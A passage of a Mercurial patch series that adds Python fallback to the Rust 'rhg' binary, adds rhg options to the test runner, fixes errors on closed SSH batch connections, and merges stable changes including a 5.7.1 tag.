a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -12,6 +12,15 @@ Unimplemented command $ rhg unimplemented-command + unsupported feature: error: Found argument 'unimplemented-command' which wasn't expected, or isn't valid in this context + + USAGE: + rhg [OPTIONS] <SUBCOMMAND> + + For more information try --help + + [252] + $ rhg unimplemented-command --config rhg.on-unsupported=abort-silent [252] Finding root @@ -153,12 +162,15 @@ $ echo indoor-pool >> .hg/requires $ rhg files + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ rhg cat -r 1 copy_of_original + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ rhg debugrequirements + unsupported feature: repository requires feature unknown to this Mercurial: indoor-pool [252] $ echo -e '\xFF' >> 
.hg/requires # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614627366 -3600 # Mon Mar 01 20:36:06 2021 +0100 # Node ID 93e9f448273c5f716604a10c58ec899af2caf6e6 # Parent 33f2d56acc732bf97e700c48bc0bcb130351c22b rhg: Add support for automatic fallback to Python `rhg` is a command-line application that can do a small subset of what `hg` can. It is written entirely in Rust, which avoids the cost of starting a Python interpreter and importing many Python modules. In a script that runs many `hg` commands, this cost can add up. However making users decide when to use `rhg` instead of `hg` is not practical as we want the subset of supported functionality to grow over time. Instead we introduce "fallback" behavior where, when `rhg` encounters something (a sub-command, a repository format, …) that is not implemented in Rust-only, it does nothing but silently start a subprocess of Python-based `hg` running the same command. That way `rhg` becomes a drop-in replacement for `hg` that sometimes goes faster. Whether Python is used should be an implementation detail not apparent to users (other than through speed). A new `fallback` value is added to the previously introduced `rhg.on-unsupported` configuration key. When in this mode, the new `rhg.fallback-executable` config determines what command to use to run a Python-based `hg`. The previous `rhg.on-unsupported = abort-silent` configuration was designed to let a wrapper script call `rhg` and then fall back to `hg` based on the exit code. This is still available, but having fallback behavior built-in in rhg might be easier for users instead of leaving that script "as an exercise for the reader". Using a subprocess like this is not ideal, especially when `rhg` is to be installed in `$PATH` as `hg`, since the other `hg.py` executable needs to still be available… somewhere. 
Eventually this could be replaced by using PyOxidizer to a have a single executable that embeds a Python interpreter, but only starts it when needed. Differential Revision: https://phab.mercurial-scm.org/D10093 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -11,6 +11,7 @@ use hg::utils::SliceExt; use std::ffi::OsString; use std::path::PathBuf; +use std::process::Command; mod blackbox; mod error; @@ -138,9 +139,43 @@ fn exit( ui: &Ui, - on_unsupported: OnUnsupported, + mut on_unsupported: OnUnsupported, result: Result<(), CommandError>, ) -> ! { + if let ( + OnUnsupported::Fallback { executable }, + Err(CommandError::UnsupportedFeature { .. }), + ) = (&on_unsupported, &result) + { + let mut args = std::env::args_os(); + let executable_path = get_path_from_bytes(&executable); + let this_executable = args.next().expect("exepcted argv[0] to exist"); + if executable_path == &PathBuf::from(this_executable) { + // Avoid spawning infinitely many processes until resource + // exhaustion. + let _ = ui.write_stderr(&format_bytes!( + b"Blocking recursive fallback. The 'rhg.fallback-executable = {}' config \ + points to `rhg` itself.\n", + executable + )); + on_unsupported = OnUnsupported::Abort + } else { + // `args` is now `argv[1..]` since we’ve already consumed `argv[0]` + let result = Command::new(executable_path).args(args).status(); + match result { + Ok(status) => std::process::exit( + status.code().unwrap_or(exitcode::ABORT), + ), + Err(error) => { + let _ = ui.write_stderr(&format_bytes!( + b"tried to fall back to a '{}' sub-process but got error {}\n", + executable, format_bytes::Utf8(error) + )); + on_unsupported = OnUnsupported::Abort + } + } + } + } match &result { Ok(_) => {} Err(CommandError::Abort { message }) => { @@ -160,6 +195,7 @@ )); } OnUnsupported::AbortSilent => {} + OnUnsupported::Fallback { .. } => unreachable!(), } } } @@ -268,18 +304,32 @@ Abort, /// Silently exit with code 252. 
AbortSilent, + /// Try running a Python implementation + Fallback { executable: Vec<u8> }, } impl OnUnsupported { + const DEFAULT: Self = OnUnsupported::Abort; + const DEFAULT_FALLBACK_EXECUTABLE: &'static [u8] = b"hg"; + fn from_config(config: &Config) -> Self { - let default = OnUnsupported::Abort; - match config.get(b"rhg", b"on-unsupported") { + match config + .get(b"rhg", b"on-unsupported") + .map(|value| value.to_ascii_lowercase()) + .as_deref() + { Some(b"abort") => OnUnsupported::Abort, Some(b"abort-silent") => OnUnsupported::AbortSilent, - None => default, + Some(b"fallback") => OnUnsupported::Fallback { + executable: config + .get(b"rhg", b"fallback-executable") + .unwrap_or(Self::DEFAULT_FALLBACK_EXECUTABLE) + .to_owned(), + }, + None => Self::DEFAULT, Some(_) => { // TODO: warn about unknown config value - default + Self::DEFAULT } } } diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -1,9 +1,10 @@ #require rust Define an rhg function that will only run if rhg exists + $ RHG="$RUNTESTDIR/../rust/target/release/rhg" $ rhg() { - > if [ -f "$RUNTESTDIR/../rust/target/release/rhg" ]; then - > "$RUNTESTDIR/../rust/target/release/rhg" "$@" + > if [ -f "$RHG" ]; then + > "$RHG" "$@" > else > echo "skipped: Cannot find rhg. Try to run cargo build in rust/rhg." 
> exit 80 @@ -151,6 +152,27 @@ $ rhg cat -r 1 copy_of_original original content +Fallback to Python + $ rhg cat original + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + $ FALLBACK="--config rhg.on-unsupported=fallback" + $ rhg cat original $FALLBACK + original content + + $ rhg cat original $FALLBACK --config rhg.fallback-executable=false + [1] + + $ rhg cat original $FALLBACK --config rhg.fallback-executable=hg-non-existent + tried to fall back to a 'hg-non-existent' sub-process but got error $ENOENT$ + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + + $ rhg cat original $FALLBACK --config rhg.fallback-executable="$RHG" + Blocking recursive fallback. The 'rhg.fallback-executable = */rust/target/release/rhg' config points to `rhg` itself. (glob) + unsupported feature: `rhg cat` without `--rev` / `-r` + [252] + Requirements $ rhg debugrequirements dotencode # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614717072 -3600 # Tue Mar 02 21:31:12 2021 +0100 # Node ID fb23685982811dc8c1cd92f4612cea526a8e2d8f # Parent 93e9f448273c5f716604a10c58ec899af2caf6e6 tests: Add `--rhg` and `--with-rhg=<path>` options for `run-tests.py` They are mostly equivalent to the corresponding `chg` options. For now, many tests are still failing in this configuration. It is *not* run on CI. 
Differential Revision: https://phab.mercurial-scm.org/D10095 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -540,6 +540,11 @@ action="store_true", help="show chg debug logs", ) + hgconf.add_argument( + "--rhg", + action="store_true", + help="install and use rhg Rust implementation in place of hg", + ) hgconf.add_argument("--compiler", help="compiler to build with") hgconf.add_argument( '--extra-config-opt', @@ -552,6 +557,7 @@ "--local", action="store_true", help="shortcut for --with-hg=<testdir>/../hg, " + "--with-rhg=<testdir>/../rust/target/release/rhg if --rhg is set, " "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set", ) hgconf.add_argument( @@ -580,6 +586,11 @@ help="use specified chg wrapper in place of hg", ) hgconf.add_argument( + "--with-rhg", + metavar="RHG", + help="use specified rhg Rust implementation in place of hg", + ) + hgconf.add_argument( "--with-hg", metavar="HG", help="test using specified hg script rather than a " @@ -667,13 +678,17 @@ parser.error('--rust cannot be used with --no-rust') if options.local: - if options.with_hg or options.with_chg: - parser.error('--local cannot be used with --with-hg or --with-chg') + if options.with_hg or options.with_rhg or options.with_chg: + parser.error( + '--local cannot be used with --with-hg or --with-rhg or --with-chg' + ) testdir = os.path.dirname(_sys2bytes(canonpath(sys.argv[0]))) reporootdir = os.path.dirname(testdir) pathandattrs = [(b'hg', 'with_hg')] if options.chg: pathandattrs.append((b'contrib/chg/chg', 'with_chg')) + if options.rhg: + pathandattrs.append((b'rust/target/release/rhg', 'with_rhg')) for relpath, attr in pathandattrs: binpath = os.path.join(reporootdir, relpath) if os.name != 'nt' and not os.access(binpath, os.X_OK): @@ -696,6 +711,8 @@ if (options.chg or options.with_chg) and os.name == 'nt': parser.error('chg does not work on %s' % os.name) + if (options.rhg or options.with_rhg) and os.name == 'nt': + 
parser.error('rhg does not work on %s' % os.name) if options.with_chg: options.chg = False # no installation to temporary location options.with_chg = canonpath(_sys2bytes(options.with_chg)) @@ -704,12 +721,28 @@ and os.access(options.with_chg, os.X_OK) ): parser.error('--with-chg must specify a chg executable') + if options.with_rhg: + options.rhg = False # no installation to temporary location + options.with_rhg = canonpath(_sys2bytes(options.with_rhg)) + if not ( + os.path.isfile(options.with_rhg) + and os.access(options.with_rhg, os.X_OK) + ): + parser.error('--with-rhg must specify a rhg executable') if options.chg and options.with_hg: # chg shares installation location with hg parser.error( '--chg does not work when --with-hg is specified ' '(use --with-chg instead)' ) + if options.rhg and options.with_hg: + # rhg shares installation location with hg + parser.error( + '--rhg does not work when --with-hg is specified ' + '(use --with-rhg instead)' + ) + if options.rhg and options.chg: + parser.error('--rhg and --chg do not work together') if options.color == 'always' and not pygmentspresent: sys.stderr.write( @@ -934,6 +967,7 @@ slowtimeout=None, usechg=False, chgdebug=False, + rhg_fallback_exe=None, useipv6=False, ): """Create a test from parameters. 
@@ -991,6 +1025,7 @@ self._hgcommand = hgcommand or b'hg' self._usechg = usechg self._chgdebug = chgdebug + self._rhg_fallback_exe = rhg_fallback_exe self._useipv6 = useipv6 self._aborted = False @@ -1473,6 +1508,12 @@ hgrc.write(b'ipv6 = %r\n' % self._useipv6) hgrc.write(b'server-header = testing stub value\n') + if self._rhg_fallback_exe: + hgrc.write(b'[rhg]\n') + hgrc.write( + b'fallback-executable = %s\n' % self._rhg_fallback_exe + ) + for opt in self._extraconfigopts: section, key = _sys2bytes(opt).split(b'.', 1) assert b'=' in key, ( @@ -2958,6 +2999,7 @@ self._coveragefile = None self._createdfiles = [] self._hgcommand = None + self._rhg_fallback_exe = None self._hgpath = None self._portoffset = 0 self._ports = {} @@ -3098,6 +3140,16 @@ chgbindir = os.path.dirname(os.path.realpath(self.options.with_chg)) self._hgcommand = os.path.basename(self.options.with_chg) + # set fallback executable path, then replace "hg" command by "rhg" + rhgbindir = self._bindir + if self.options.rhg or self.options.with_rhg: + self._rhg_fallback_exe = os.path.join(self._bindir, self._hgcommand) + if self.options.rhg: + self._hgcommand = b'rhg' + elif self.options.with_rhg: + rhgbindir = os.path.dirname(os.path.realpath(self.options.with_rhg)) + self._hgcommand = os.path.basename(self.options.with_rhg) + osenvironb[b"BINDIR"] = self._bindir osenvironb[b"PYTHON"] = PYTHON @@ -3116,6 +3168,8 @@ path.insert(2, realdir) if chgbindir != self._bindir: path.insert(1, chgbindir) + if rhgbindir != self._bindir: + path.insert(1, rhgbindir) if self._testdir != runtestdir: path = [self._testdir] + path if self._tmpbindir != self._bindir: @@ -3423,6 +3477,7 @@ hgcommand=self._hgcommand, usechg=bool(self.options.with_chg or self.options.chg), chgdebug=self.options.chg_debug, + rhg_fallback_exe=self._rhg_fallback_exe, useipv6=useipv6, **kwds ) # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614860813 -3600 # Thu Mar 04 13:26:53 2021 +0100 # Node ID 
e8cd519a0a34a1fa08a7a035fedee77b06684d16 # Parent fb23685982811dc8c1cd92f4612cea526a8e2d8f rhg: Ignore trailing newlines in .hg/sharedpath Differential Revision: https://phab.mercurial-scm.org/D10132 diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,8 +1,8 @@ use crate::config::{Config, ConfigError, ConfigParseError}; use crate::errors::{HgError, IoErrorContext, IoResultExt}; use crate::requirements; -use crate::utils::current_dir; use crate::utils::files::get_path_from_bytes; +use crate::utils::{current_dir, SliceExt}; use memmap::{Mmap, MmapOptions}; use std::collections::HashSet; use std::path::{Path, PathBuf}; @@ -118,7 +118,8 @@ store_path = dot_hg.join("store"); } else { let bytes = hg_vfs.read("sharedpath")?; - let mut shared_path = get_path_from_bytes(&bytes).to_owned(); + let mut shared_path = + get_path_from_bytes(bytes.trim_end_newlines()).to_owned(); if relative { shared_path = dot_hg.join(shared_path) } diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -67,6 +67,7 @@ } pub trait SliceExt { + fn trim_end_newlines(&self) -> &Self; fn trim_end(&self) -> &Self; fn trim_start(&self) -> &Self; fn trim(&self) -> &Self; @@ -80,6 +81,13 @@ } impl SliceExt for [u8] { + fn trim_end_newlines(&self) -> &[u8] { + if let Some(last) = self.iter().rposition(|&byte| byte != b'\n') { + &self[..=last] + } else { + &[] + } + } fn trim_end(&self) -> &[u8] { if let Some(last) = self.iter().rposition(is_not_whitespace) { &self[..=last] # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1614265163 18000 # Thu Feb 25 09:59:23 2021 -0500 # Node ID fe36ce0fbcdde0eb3ce019e26e5e61eb4729bc3a # Parent e8cd519a0a34a1fa08a7a035fedee77b06684d16 test: show internal exception with batchable rpcs over ssh Differential Revision: https://phab.mercurial-scm.org/D10072 diff --git 
a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t new file mode 100644 --- /dev/null +++ b/tests/test-ssh-batch.t @@ -0,0 +1,13 @@ + $ hg init a + $ cd a + $ touch a; hg commit -qAm_ + $ hg bookmark $(for i in $($TESTDIR/seq.py 0 20); do echo b$i; done) + $ hg clone . ../b -q + $ cd ../b + +Checking that when lookup multiple bookmarks in one go, if one of them +fails (thus causing the sshpeer to be stopped), the errors from the +further lookups don't result in tracebacks. + + $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a |& tail -n 1 + ValueError: I/O operation on closed file # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1614265208 18000 # Thu Feb 25 10:00:08 2021 -0500 # Node ID fa30292b680ba80e32bfd3e927a8fcbd553489d4 # Parent fe36ce0fbcdde0eb3ce019e26e5e61eb4729bc3a sshpeer: don't fail forwarding output from closed connections The test still shows an internal error, but one that happens further along. Differential Revision: https://phab.mercurial-scm.org/D10073 diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -40,7 +40,7 @@ """display all data currently available on pipe as remote output. This is non blocking.""" - if pipe: + if pipe and not pipe.closed: s = procutil.readpipe(pipe) if s: display = ui.warn if warn else ui.status diff --git a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t --- a/tests/test-ssh-batch.t +++ b/tests/test-ssh-batch.t @@ -10,4 +10,4 @@ further lookups don't result in tracebacks. 
$ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a |& tail -n 1 - ValueError: I/O operation on closed file + StopIteration # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1614265713 18000 # Thu Feb 25 10:08:33 2021 -0500 # Node ID aa2e38147e8b51f0ad9a45cca345fe4c221325d7 # Parent fa30292b680ba80e32bfd3e927a8fcbd553489d4 wireprotov1peer: don't raise internal errors in some cases Specifically, when the peer is closed in the middle of a batch of rpcs. Differential Revision: https://phab.mercurial-scm.org/D10074 diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -201,7 +201,9 @@ msg = inst.args[1] if isinstance(msg, type(u'')): msg = pycompat.sysbytes(msg) - if not isinstance(msg, bytes): + if msg is None: + ui.error(b"\n") + elif not isinstance(msg, bytes): ui.error(b" %r\n" % (msg,)) elif not msg: ui.error(_(b" empty string\n")) diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -310,7 +310,7 @@ if not f.done(): f.set_exception( error.ResponseError( - _(b'unfulfilled batch command response') + _(b'unfulfilled batch command response'), None ) ) @@ -322,16 +322,27 @@ for command, f, batchable, fremote in states: # Grab raw result off the wire and teach the internal future # about it. - remoteresult = next(wireresults) - fremote.set(remoteresult) + try: + remoteresult = next(wireresults) + except StopIteration: + # This can happen in particular because next(batchable) + # in the previous iteration can call peer._abort, which + # may close the peer. + f.set_exception( + error.ResponseError( + _(b'unfulfilled batch command response'), None + ) + ) + else: + fremote.set(remoteresult) - # And ask the coroutine to decode that value. 
- try: - result = next(batchable) - except Exception: - pycompat.future_set_exception_info(f, sys.exc_info()[1:]) - else: - f.set_result(result) + # And ask the coroutine to decode that value. + try: + result = next(batchable) + except Exception: + pycompat.future_set_exception_info(f, sys.exc_info()[1:]) + else: + f.set_result(result) @interfaceutil.implementer( diff --git a/tests/test-ssh-batch.t b/tests/test-ssh-batch.t --- a/tests/test-ssh-batch.t +++ b/tests/test-ssh-batch.t @@ -9,5 +9,7 @@ fails (thus causing the sshpeer to be stopped), the errors from the further lookups don't result in tracebacks. - $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a |& tail -n 1 - StopIteration + $ hg pull -r b0 -r nosuchbookmark $(for i in $($TESTDIR/seq.py 1 20); do echo -r b$i; done) -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/$(pwd)/../a + pulling from ssh://user@dummy/$TESTTMP/b/../a + abort: unknown revision 'nosuchbookmark' + [255] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615397004 -3600 # Wed Mar 10 18:23:24 2021 +0100 # Node ID c7f6c3027af22321edb76a99b79640e53b3db843 # Parent aa2e38147e8b51f0ad9a45cca345fe4c221325d7 remotefilelog: remove unused import This is no longer used since a4c19a162615. 
Differential Revision: https://phab.mercurial-scm.org/D10152 diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -8,7 +8,6 @@ from __future__ import absolute_import from mercurial import ( - extensions, hg, pycompat, sshpeer, # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615397063 -3600 # Wed Mar 10 18:24:23 2021 +0100 # Node ID 79cfe18c20b52f13e32f0eef97bef0f6a58a8f51 # Parent c7f6c3027af22321edb76a99b79640e53b3db843 test: update expected output in test-http.t The output was introduced in a4c19a162615 and is wrong and unstable. So we glob it as other part of these tests already do. Differential Revision: https://phab.mercurial-scm.org/D10153 diff --git a/tests/test-http.t b/tests/test-http.t --- a/tests/test-http.t +++ b/tests/test-http.t @@ -382,7 +382,7 @@ devel-peer-request: 16 bytes of commands arguments in headers devel-peer-request: finished in *.???? seconds (200) (glob) received listkey for "phases": 15 bytes - (sent 9 HTTP requests and 3898 bytes; received 920 bytes in responses) + (sent 9 HTTP requests and * bytes; received * bytes in responses) (glob) (?) $ hg rollback -q $ sed 's/.*] "/"/' < ../access.log diff --git a/tests/test-lfs-serve.t b/tests/test-lfs-serve.t --- a/tests/test-lfs-serve.t +++ b/tests/test-lfs-serve.t @@ -462,7 +462,7 @@ remote: adding manifests remote: adding file changes remote: added 1 changesets with 1 changes to 1 files - (sent 8 HTTP requests and 3526 bytes; received 961 bytes in responses) (?) + (sent 8 HTTP requests and * bytes; received * bytes in responses) (glob) (?) 
$ grep 'lfs' .hg/requires $SERVER_REQUIRES .hg/requires:lfs $TESTTMP/server/.hg/requires:lfs # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1615572793 18000 # Fri Mar 12 13:13:13 2021 -0500 # Node ID 6f4a481f182af5005ded9f3eb232dd7c16fa1af3 # Parent 79cfe18c20b52f13e32f0eef97bef0f6a58a8f51 # Parent ed3fb1ae5ab18970dca849233986cad5b3a1c493 merge: with stable diff --git a/.hgsigs b/.hgsigs --- a/.hgsigs +++ b/.hgsigs @@ -207,3 +207,4 @@ 1d5189a57405ceca5aa244052c9f948977f4699b 0 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 diff --git a/.hgtags b/.hgtags --- a/.hgtags +++ b/.hgtags @@ -220,3 +220,4 @@ 1d5189a57405ceca5aa244052c9f948977f4699b 5.6.1 9da65e3cf3706ff41e08b311381c588440c27baf 5.7rc0 0e2e7300f4302b02412b0b734717697049494c4c 5.7 +d5d9177c0045d206db575bae6daa98e2cb2fe5bc 5.7.1 diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -280,14 +280,12 @@ return super(narrowfilelog, self).size(rev) def cmp(self, node, text): - different = super(narrowfilelog, self).cmp(node, text) + # We don't call `super` because narrow parents can be buggy in case of a + # ambiguous dirstate. Always take the slow path until there is a better + # fix, see issue6150. - # Because renamed() may lie, we may get false positives for - # different content. Check for this by comparing against the original - # renamed() implementation. - if different: - if super(narrowfilelog, self).renamed(node): - t2 = self.read(node) - return t2 != text + # Censored files compare against the empty file. 
+ if self.iscensored(self.rev(node)): + return text != b'' - return different + return self.read(node) != text diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1032,7 +1032,7 @@ incoming.autobuild:run-with-plain = yes # HGPLAIN never set incoming.autobuild:run-with-plain = no - # HGPLAIN inherited from environment (default before Mercurila 5.7) + # HGPLAIN inherited from environment (default before Mercurial 5.7) incoming.autobuild:run-with-plain = auto Most hooks are run with environment variables set that give useful diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -543,7 +543,7 @@ except ValueError as e: # Can be raised on Python 3.8 when path is invalid. raise error.Abort( - _(b'invalid path %s: %s') % (path, pycompat.bytestr(e)) + _(b'invalid path %s: %s') % (path, stringutil.forcebytestr(e)) ) raise error.RepoError(_(b'repository %s not found') % path) @@ -571,7 +571,7 @@ # repository was shared the old way. 
We check the share source .hg/requires # for SHARESAFE_REQUIREMENT to detect whether the current repository needs # to be reshared - hint = _("see `hg help config.format.use-share-safe` for more information") + hint = _(b"see `hg help config.format.use-share-safe` for more information") if requirementsmod.SHARESAFE_REQUIREMENT in requirements: if ( @@ -1137,7 +1137,7 @@ """File storage when using revlogs.""" def file(self, path): - if path[0] == b'/': + if path.startswith(b'/'): path = path[1:] return filelog.filelog(self.svfs, path) @@ -1148,7 +1148,7 @@ """File storage when using revlogs and narrow files.""" def file(self, path): - if path[0] == b'/': + if path.startswith(b'/'): path = path[1:] return filelog.narrowfilelog(self.svfs, path, self._storenarrowmatch) diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -876,7 +876,7 @@ # slowpath; otherwise, we can turn off the slowpath if slowpath: for path in match.files(): - if path == b'.' 
